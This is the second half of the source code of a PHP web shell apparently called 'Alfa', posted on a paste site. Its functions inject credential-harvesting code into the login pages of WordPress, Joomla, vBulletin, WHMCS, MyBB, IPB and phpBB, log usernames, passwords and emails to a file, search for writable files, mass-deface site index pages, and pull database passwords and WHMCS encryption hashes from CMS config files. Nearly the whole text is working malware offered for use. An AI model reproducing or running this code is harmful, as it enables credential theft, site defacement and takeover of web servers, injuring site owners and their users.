- alfafooter();
- } function alfacmshijacker(){ alfahead();
- AlfaNum(5,6,7,8,9,10);
- echo '<div class=header><br>
- <center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);
- return false;
- " method=\'post\'>
- <div class="txtfont">CMS: <select style="width:100px;
- " name="cmshi">';
- $cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
- foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
- echo("</select>");
- echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
- SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
- <input type="submit" name="btn" value=" "></form></center><br>';
- $cms = $_POST['alfa1'];
- $saveto = $_POST['alfa2'];
- $cmspath = $_POST['alfa4'];
- if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){ echo __pre();
- alfaHijackCms($cms,$cmspath,$saveto);
- } echo '</div>';
- alfafooter();
- } function alfaHijackCms($cms,$cmspath,$saveto){ switch($cms){ case "vb": hijackvBulletin($cmspath,$saveto);
- break;
- case "wp": hijackwp($cmspath,$saveto);
- break;
- case "jom": hijackJoomla($cmspath,$saveto);
- break;
- case "whmcs": hijackWhmcs($cmspath,$saveto);
- break;
- case "mybb": hijackMybb($cmspath,$saveto);
- break;
- case "ipb": hijackIPB($cmspath,$saveto);
- break;
- case "phpbb": hijackPHPBB($cmspath,$saveto);
- break;
- default: echo "error!";
- break;
- } } function hijackvBulletin($path,$saveto){ $code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);
- $alfa_password = $vbulletin->GPC["vb_login_password"];
- $alfa_file = "{saveto_path}";
- $sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");
- while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");
- @fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");
- @fclose($fp1);
- $f = @file($alfa_file);
- $new = array_unique($f);
- $fp = @fopen($alfa_file, "w");
- foreach($new as $values){@fputs($fp, $values);
- }@fclose($fp);
- }}';
- $clearpw = '$show[\'nopasswordempty\'] = defined(\'DISABLE_PASSWORD_CLEARING\') ? 1 : 0;
- ';
- $code=str_replace('{saveto_path}',$saveto,$code);
- $login = $path."/login.php";
- $class = $path."/includes/class_bootstrap.php";
- $dologin = 'do_login_redirect();
- ';
- $evil_login = "\t".$code."\n\t".$dologin;
- $evil_class = "\t\t//".$clearpw;
- if(is_file($login) AND is_writable($login) AND is_file($class) AND is_writable($class)){ $data_login = @file_get_contents($login);
- $data_class = @file_get_contents($class);
- if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){ $login_replace = str_replace($dologin,$evil_login, $data_login);
- $class_replace = str_replace($clearpw,$evil_class, $data_class);
- @file_put_contents($login, $login_replace);
- @file_put_contents($class, $class_replace);
- hijackOutput(0,$saveto);
- }else{ hijackOutput(1);
- } }else{ hijackOutput(1);
- } } function hijackwp($path,$saveto){ $code = '$alfa_file="{saveto_path}";
- $fp = fopen($alfa_file, "a+");
- fwrite($fp, $_POST[\'log\'].":".$_POST[\'pwd\']." (".($user->user_email).")\n");
- fclose($fp);
- $f = @file($alfa_file);
- $new = array_unique($f);
- $fp = @fopen($alfa_file, "w");
- foreach($new as $values){@fputs($fp, $values);
- }@fclose($fp);
- ';
- $redirect_wp = 'wp_safe_redirect($redirect_to);
- ';
- $code=str_replace('{saveto_path}',$saveto,$code);
- $login=$path."/wp-login.php";
- $evil_login = "\t".$code."\n\t".$redirect_wp;
- if(is_file($login) AND is_writable($login)){ $data_login = @file_get_contents($login);
- if(strstr($data_login, $redirect_wp)){ $login_replace = str_replace($redirect_wp,$evil_login, $data_login);
- @file_put_contents($login, $login_replace);
- hijackOutput(0,$saveto);
- }else{ hijackOutput(1);
- } }else{ hijackOutput(1);
- } } function hijackJoomla($path,$saveto){ $code = '<?php jimport(\'joomla.user.authentication\');
- $Alfa_auth = & JAuthentication::getInstance();
- $Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);
- $Alfa_options = array();
- $Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);
- if($Alfa_response->status == 1){$alfa_file="{saveto_path}";
- $fp=@fopen($alfa_file,"a+");
- @fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");
- @fclose($fp);
- $f = @file($alfa_file);
- $new = array_unique($f);
- $fp = @fopen($alfa_file, "w");
- foreach($new as $values){@fputs($fp, $values);
- }@fclose($fp);
- }?>';
- $code=str_replace('{saveto_path}',$saveto,$code);
- $comp=$path."/administrator/components/com_login/";
- if(is_file($comp."/login.php")){ $login = $comp."/login.php";
- }elseif(is_file($comp."/admin.login.php")){ $login = $comp."/admin.login.php";
- }else{ $login = '';
- } if(is_file($login) AND is_writable($login) AND $login != ''){ $data_login = @file_get_contents($login);
- $evil_login = $code."\n".$data_login;
- @file_put_contents($login, $evil_login);
- hijackOutput(0,$saveto);
- }else{ hijackOutput(1);
- } } function hijackWhmcs($path,$saveto){ $code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";
- $alfa_uname = @$_POST[\'username\'];
- $alfa_pw = @$_POST[\'password\'];
- if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";
- $admin = true;
- }else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";
- $admin = false;
- }$alfa_query = mysqli_query($alfa_connect, $alfa_q);
- if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);
- $allow = true;
- if(!$admin){$__salt = explode(\':\', $row[\'password\']);
- $__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];
- if($row[\'password\'] == $__encPW){$allow = true;
- $row[\'username\'] = $row[\'email\'];
- }else{$allow = false;
- }}if($allow){$fp = @fopen($alfa_file, "a+");
- @fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");
- @fclose($fp);
- $f = @file($alfa_file);
- $new = array_unique($f);
- $fp = @fopen($alfa_file, "w");
- foreach($new as $values){@fwrite($fp, $values);
- }@fclose($fp);
- }}}}?>';
- $code=str_replace('{saveto_path}',$saveto,$code);
- $conf=$path."/configuration.php";
- if(is_file($conf) AND is_writable($conf)){ $data_conf = @file_get_contents($conf);
- if(!strstr($data_conf,'?>'))$code = '?>'.$code;
- $evil_conf = $data_conf."\n".$code;
- @file_put_contents($conf, $evil_conf);
- hijackOutput(0,$saveto);
- }else{ hijackOutput(1);
- } } function hijackMybb($path,$saveto){ $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");
- $alfa_fetch = $db->fetch_array($alfa_q);
- $alfa_file = "{saveto_path}";
- $fp = @fopen($alfa_file, "a+");
- @fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");
- @fclose($fp);
- $f = @file($alfa_file);
- $new = array_unique($f);
- $fp = @fopen($alfa_file, "w");
- foreach($new as $values){@fwrite($fp, $values);
- }@fclose($fp);
- ';
- $find = '$loginhandler->complete_login();
- ';
- $code=str_replace('{saveto_path}',$saveto,$code);
- $login=$path."/member.php";
- $evil_login = "\t".$code."\n\t".$find;
- if(is_file($login) AND is_writable($login)){ $data_login = @file_get_contents($login);
- if(strstr($data_login, $find)){ $login_replace = str_replace($find,$evil_login, $data_login);
- @file_put_contents($login, $login_replace);
- hijackOutput(0,$saveto);
- }else{ hijackOutput(1);
- } }else{ hijackOutput(1);
- } } function hijackIPB($path,$saveto){ $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));
- $Alfa_file = "{saveto_path}";
- $fp = @fopen($Alfa_file, "a+");
- @fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");
- @fclose($fp);
- $f = @file($Alfa_file);
- $new = array_unique($f);
- $fp = @fopen($Alfa_file, "w");
- foreach($new as $values){@fputs($fp, $values);
- }@fclose($fp);
- ';
- $find = 'unset( $member[\'plainPassword\'] );
- ';
- $code=str_replace('{saveto_path}',$saveto,$code);
- $login=$path."/admin/sources/handlers/han_login.php";
- $evil_login = "\t".$find."\n\t".$code;
- if(is_file($login) AND is_writable($login)){ $data_login = @file_get_contents($login);
- if(strstr($data_login, $find)){ $login_replace = str_replace($find,$evil_login, $data_login);
- @file_put_contents($login, $login_replace);
- hijackOutput(0,$saveto);
- }else{ hijackOutput(1);
- } }else{ hijackOutput(1);
- } } function hijackPHPBB($path,$saveto){ $code = '$Alfa_u = request_var(\'username\', \'\');
- $Alfa_p = request_var(\'password\', \'\');
- if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);
- if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";
- $fp = @fopen($Alfa_file, "a+");
- @fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");
- @fclose($fp);
- $f = @file($Alfa_file);
- $new = array_unique($f);
- $fp = @fopen($Alfa_file, "w");
- foreach($new as $values){@fputs($fp, $values);
- }@fclose($fp);
- }}';
- $find = 'case \'login\':';
- $code=str_replace('{saveto_path}',$saveto,$code);
- $login=$path."/ucp.php";
- $evil_login = "\t".$find."\n\t".$code;
- if(is_file($login) AND is_writable($login)){ $data_login = @file_get_contents($login);
- if(strstr($data_login, $find)){ $login_replace = str_replace($find,$evil_login, $data_login);
- @file_put_contents($login, $login_replace);
- hijackOutput(0,$saveto);
- }else{ hijackOutput(1);
- } }else{ hijackOutput(1);
- } } function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');
- } function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){ if(@is_dir($dir)){ $files=@scandir($dir);
- foreach($files as $key => $value){ $path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
- if(!@is_dir($path)){ if($ext!='*'){$f = basename($path);
- $f = explode('.',$f);
- $f = end($f);
- if($f!=$ext)continue;
- } if($e=='str'){ $content = @file_get_contents($path);
- if(strpos($content, $string) !== false){ echo str_replace('\\','/',$path) . "<br>";
- } }else{ if(strstr($value,$string)){ echo str_replace('\\','/',$path) . "<br>";
- } } $results[] = $path;
- }elseif($value != "." && $value != "..") { Alfa_StrSearcher($path,$string,$ext,$e,$results);
- $results[] = $path;
- }}}} function alfasearcher(){ alfahead();
- echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
- if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){ echo '<center><div class="txtfont_header">| Find Readable Or Writable Files |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');
- return false;
- " method=\'post\'>
- <div class="txtfont">
- Method: <select style="width: 18%;
- " onclick="alfa_searcher_tool(this.value);
- " name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
- Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
- Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;
- " type="text" name="ext" size="5" value="php">
- <input type="submit" name="btn" value=" "></div></form></center><br>';
- $dir = $_POST['alfa2'];
- $ext = $_POST['alfa3'];
- $method = $_POST['alfa4'];
- if($_POST['alfa5']=='>>'){ echo __pre();
- if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
- Alfa_Searcher($dir,trim($ext),$method);
- } } if($_POST['alfa1']=='str'){ echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);
- return false;
- " method=\'post\'>
- <div class="txtfont">
- Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
- String: <input type="text" name="string" value="">
- Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
- Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;
- " type="text" name="ext" size="5" value="php">
- <input type="submit" name="btn" value=" "></div></form></center><br>';
- $dir = $_POST['alfa2'];
- $string = $_POST['alfa3'];
- $ext = $_POST['alfa5'];
- if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){ echo __pre();
- Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
- } } echo '</div>';
- alfafooter();
- } function alfaMassDefacer(){ alfahead();
- AlfaNum(5,6,7,8,9,10);
- echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');
- return false;
- \" method='post'>";
- echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
- Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
- DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
- </form>';
- $dir = $_POST['alfa1'];
- $defpage = $_POST['alfa2'];
- $method = $_POST['alfa3'];
- $fCurrent = $GLOBALS['__file_path'];
- if($_POST['alfa4'] == '>>'){ if(!empty($dir)){ if(@is_dir($dir)){ if(@is_readable($dir)){ if(@is_file($defpage)){ if($dh = @opendir($dir)){ echo __pre();
- while (($file = @readdir($dh)) !== false){ if($file == '..' || $file == '.')continue;
- $newfile=$dir.$file;
- if($fCurrent == $newfile)continue;
- if(@is_dir($newfile)){ Alfa_ReadDir($newfile,$method,$defpage);
- }else{ if(!@is_writable($newfile))continue;
- if(!@is_readable($newfile))continue;
- Alfa_Rewriter($newfile,$file,$defpage,$method);
- } } closedir($dh);
- }else{__alert('<font color="red">Error In OpenDir...</font>');
- } }else{__alert('<font color="red">DefPage File NotFound...</font>');
- } }else{__alert('<font color="red">Directory is not Readable...</font>');
- } }else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');
- } }else{__alert('<font color="red">Dir is Empty...</font>');
- } } echo '</div>';
- alfafooter();
- } function Alfa_ReadDir($dir,$method='',$defpage=''){ if(!@is_readable($dir)) return false;
- if (@is_dir($dir)) { if ($dh = @opendir($dir)) { while(($file=readdir($dh))!==false) { if($file == '..' || $file == '.')continue;
- $newfile=$dir.'/'.$file;
- if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
- if(@is_file($newfile)){ if(!@is_readable($newfile))continue;
- Alfa_Rewriter($newfile,$file,$defpage,$method);
- } } closedir($dh);
- } } } function Alfa_Rewriter($dir,$file,$defpage,$m='index'){ if(!@is_writable($dir)) return false;
- if(!@is_readable($dir)) return false;
- $defpage=@file_get_contents($defpage);
- if($m == 'index'){ $indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
- if(in_array(strtolower($file),$indexs)){ @file_put_contents($dir,$defpage);
- echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
- } }elseif($m=='all'){ @file_put_contents($dir,$defpage);
- echo @is_file($dir)?$dir." <b><font color='red'>DeFaced...</b></font><br>" : '';
- } } function alfaGetDisFunc(){ alfahead();
- echo '<div class="header">';
- $disfun = @ini_get('disable_functions');
- $s = explode(',',$disfun);
- $f = array_unique($s);
- echo '<center><br><b><font color="#7CFC00">Disabled Functions</font></b><pre>';
- echo '<table border="1">
- <tr>
- <td align="center" style="background-color: green;
- color: white;
- width:5%">#</td>
- <td align="center" style="background-color: green;
- color: white;
- ">Func Name</td>
- </tr>
- ';
- $i=1;
- foreach($f as $s){ $s=trim($s);
- if(function_exists($s))continue;
- echo '<tr><td align="center" style="background-color: black;
- ">'.$i.'</td>';
- echo '<td align="center" style="background-color: black;
- "><a style="text-decoration: none;
- color: red;
- " target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><font color="red"><b>'.$s.'</b></font></a></td>';
- $i++;
- } echo '</table></center>';
- echo '</div>';
- alfafooter();
- } function Alfa_Create_A_Tag($action,$vals){ $nulls = array();
- foreach($vals as $key => $val){ echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
- for($i=1;
- $i<=$val[1]-1;
- $i++)$nulls[] = 'null';
- $f = implode(',',$nulls);
- echo $f.',\''.$val[0].'\');
- return false;
- ">| '.$key.' | </a>';
- unset($nulls);
- } } function Alfa_Searcher($dir, $ext, $method) { if(@is_readable($dir)){ if($method == 'all')$ext = '*';
- if($method == 'dirs')$ext = '*';
- $globFiles = @glob("$dir/*.$ext");
- $globDirs = @glob("$dir/*", GLOB_ONLYDIR);
- $blacklist = array();
- foreach ($globDirs as $dir) { if(!@is_readable($dir)) continue;
- @Alfa_Searcher($dir, $ext, $method);
- } switch($method){ case "files": foreach ($globFiles as $file){ if(@is_writable($file)){ echo "$file<br>";
- } } break;
- case "dirs": foreach ($globFiles as $file){ if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){ echo dirname($file).'<br>';
- $blacklist[] = dirname($file);
- } } break;
- case "all": foreach ($globFiles as $file){ echo $file.'<br>';
- } break;
- } unset($blacklist);
- } } function AlfaiFrameCreator($f,$width='100%',$height='600px'){ return('<iframe src="'.$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
- } class AlfaCURL { var $headers;
- var $user_agent;
- var $compression;
- var $cookie_file;
- var $proxy;
- var $path;
- var $ssl = false;
- function AlfaCURL($cookies=false,$compression='gzip',$proxy=''){ $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
- $this->headers[] = 'Connection: Keep-Alive';
- $this->headers[] = 'Content-type: application/x-www-form-urlencoded;
- charset=UTF-8';
- $this->user_agent = 'Mozilla/4.0 (compatible;
- MSIE 7.0;
- Windows NT 5.1;
- .NET CLR 1.0.3705;
- .NET CLR 1.1.4322;
- Media Center PC 4.0)';
- $this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
- $this->compression=$compression;
- $this->proxy=$proxy;
- $this->cookies=$cookies;
- if($this->cookies)$this->cookie($this->path);
- } function cookie($cookie_file) { if (@file_exists($cookie_file)) { $this->cookie_file=$cookie_file;
- }else{ @fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
- $this->cookie_file=$cookie_file;
- @fclose($this->cookie_file);
- } } function Send($url,$method="get",$data=""){ $process = curl_init($url);
- curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
- curl_setopt($process, CURLOPT_HEADER, 0);
- curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
- curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($process, CURLOPT_ENCODING , $this->compression);
- curl_setopt($process, CURLOPT_TIMEOUT, 30);
- if($this->ssl){ curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
- curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
- } if($this->cookies){ curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
- curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
- } if($this->proxy){ curl_setopt($process, CURLOPT_PROXY, $this->proxy);
- } if($method=='post'){ curl_setopt($process, CURLOPT_POSTFIELDS, $data);
- curl_setopt($process, CURLOPT_POST, 1);
- } $return = curl_exec($process);
- curl_close($process);
- return $return;
- } function error($error) { echo "<center><div style='width:500px;
- border: 3px solid #FFEEFF;
- padding: 3px;
- background-color: #FFDDFF;
- font-family: verdana;
- font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
- die;
- } } function getConfigHtml($cms){ $content = '';
- $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
- $content .= "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);
- return false;
- '><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;
- '>";
- foreach($cms_array as $key => $val){ $content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
- } $content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
- $content .= "</form>";
- return $content;
- } function alfaGetConfig(){ $cms = $_POST['alfa1'];
- $path = trim($_POST['alfa2']);
- $config = array( 'wp'=>array('file'=>'/wp-config.php', 'host'=>array("/define\('DB_HOST',(\s+)'(.*?)'\);
- /",2), 'dbname'=>array("/define\('DB_NAME',(\s+)'(.*?)'\);
- /",2), 'dbuser'=>array("/define\('DB_USER',(\s+)'(.*?)'\);
- /",2), 'dbpw'=>array("/define\('DB_PASSWORD',(\s+)'(.*?)'\);
- /",2), 'prefix'=>array("/table_prefix(\s+)=(\s+)'(.*?)';
- /",3) ), 'drupal'=>array('file'=>'/config.php', 'host'=>array("/define\('DB_HOSTNAME',(\s+)'(.*?)'\);
- /",2), 'dbname'=>array("/define\('DB_DATABASE',(\s+)'(.*?)'\);
- /",2), 'dbuser'=>array("/define\('DB_USERNAME',(\s+)'(.*?)'\);
- /",2), 'dbpw'=>array("/define\('DB_PASSWORD',(\s+)'(.*?)'\);
- /",2), 'prefix'=>array("/define\('DB_PREFIX',(\s+)'(.*?)'\);
- /",2) ), 'vb'=>array('file'=>'/includes/config.php', 'host'=>array("/config\['MasterServer'\]\['servername'\](\s+)=(\s+)'(.*?)';
- /",3), 'dbuser'=>array("/config\['MasterServer'\]\['username'\](\s+)=(\s+)'(.*?)';
- /",3), 'dbname'=>array("/config\['Database'\]\['dbname'\](\s+)=(\s+)'(.*?)';
- /",3), 'dbpw'=>array("/config\['MasterServer'\]\['password'\](\s+)=(\s+)'(.*?)';
- /",3), 'prefix'=>array("/config\['Database'\]\['tableprefix'\](\s+)=(\s+)'(.*?)';
- /",3) ), 'phpnuke'=>array('file'=>'/config.php', 'host'=>array('/dbhost(\s+)=(\s+)"(.*?)";
- /',3), 'dbname'=>array('/dbname(\s+)=(\s+)"(.*?)";
- /',3), 'dbuser'=>array('/dbuname(\s+)=(\s+)"(.*?)";
- /',3), 'dbpw'=>array('/dbpass(\s+)=(\s+)"(.*?)";
- /',3), 'prefix'=>array('/prefix(\s+)=(\s+)"(.*?)";
- /',3) ), 'smf'=>array('file'=>'/Settings.php', 'host'=>array("/db_server(\s+)=(\s+)'(.*?)';
- /",3), 'dbname'=>array("/db_name(\s+)=(\s+)'(.*?)';
- /",3), 'dbuser'=>array("/db_user(\s+)=(\s+)'(.*?)';
- /",3), 'dbpw'=>array("/db_passwd(\s+)=(\s+)'(.*?)';
- /",3), 'prefix'=>array("/db_prefix(\s+)=(\s+)'(.*?)';
- /",3) ), 'whmcs'=>array('file'=>'/configuration.php', 'host'=>array("/db_host(\s+)=(\s+)'(.*?)';
- /",3), 'dbname'=>array("/db_name(\s+)=(\s+)'(.*?)';
- /",3), 'dbuser'=>array("/db_username(\s+)=(\s+)'(.*?)';
- /",3), 'dbpw'=>array("/db_password(\s+)=(\s+)'(.*?)';
- /",3), 'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)'(.*?)';
- /",3) ), 'joomla'=>array('file'=>'/configuration.php', 'host'=>array("/\\\$host(\s+)=(\s+)'(.*?)';
- /",3), 'dbname'=>array("/\\\$db(\s+)=(\s+)'(.*?)';
- /",3), 'dbuser'=>array("/\\\$user(\s+)=(\s+)'(.*?)';
- /",3), 'dbpw'=>array("/\\\$password(\s+)=(\s+)'(.*?)';
- /",3), 'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)'(.*?)';
- /",3) ), 'phpbb'=>array('file'=>'/config.php', 'host'=>array("/dbhost(\s+)=(\s+)'(.*?)';
- /",3), 'dbname'=>array("/dbname(\s+)=(\s+)'(.*?)';
- /",3), 'dbuser'=>array("/dbuser(\s+)=(\s+)'(.*?)';
- /",3), 'dbpw'=>array("/dbpasswd(\s+)=(\s+)'(.*?)';
- /",3), 'prefix'=>array("/table_prefix(\s+)=(\s+)'(.*?)';
- /",3) ), 'mybb'=>array('file'=>'/inc/config.php', 'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)'(.*?)';
- /",3), 'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)'(.*?)';
- /",3), 'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)'(.*?)';
- /",3), 'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)'(.*?)';
- /",3), 'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)'(.*?)';
- /",3) ) );
- $data = array();
- $srch_host = $config[$cms]['host'][0];
- $srch_user = $config[$cms]['dbuser'][0];
- $srch_name = $config[$cms]['dbname'][0];
- $srch_pw = $config[$cms]['dbpw'][0];
- $prefix = $config[$cms]['prefix'][0];
- $file = $config[$cms]['file'];
- $chost = $config[$cms]['host'][1];
- $cuser = $config[$cms]['dbuser'][1];
- $cname = $config[$cms]['dbname'][1];
- $cpw = $config[$cms]['dbpw'][1];
- $cprefix = $config[$cms]['prefix'][1];
- if(@is_dir($path)){ $file=$path.$file;
- }elseif(@is_file($path)){ $file=$path;
- }else{ return false;
- } $file = @file_get_contents($file);
- if(preg_match($srch_host, $file, $mach)){ $data['host'] = $mach[$chost];
- } if(preg_match($srch_user, $file, $mach)){ $data['user'] = $mach[$cuser];
- } if(preg_match($srch_name, $file, $mach)){ $data['dbname'] = $mach[$cname];
- } if(preg_match($srch_pw, $file, $mach)){ $data['password'] = $mach[$cpw];
- } if(isset($prefix)){ if(preg_match($prefix, $file, $mach)){ $data['prefix'] = $mach[$cprefix];
- } } if($cms=='whmcs'){ if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){ $data['cc_encryption_hash'] = $mach[3];
- } } echo json_encode($data);
- } if(empty($_POST['a'])) if(isset($default_action) && function_exists('alfa' . $default_action)) $_POST['a'] = $default_action;
- else $_POST['a'] = 'FilesMan';
- if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a'])) call_user_func('alfa' . $_POST['a']);
- exit;
- ?>
Add Comment
Please, Sign In to add comment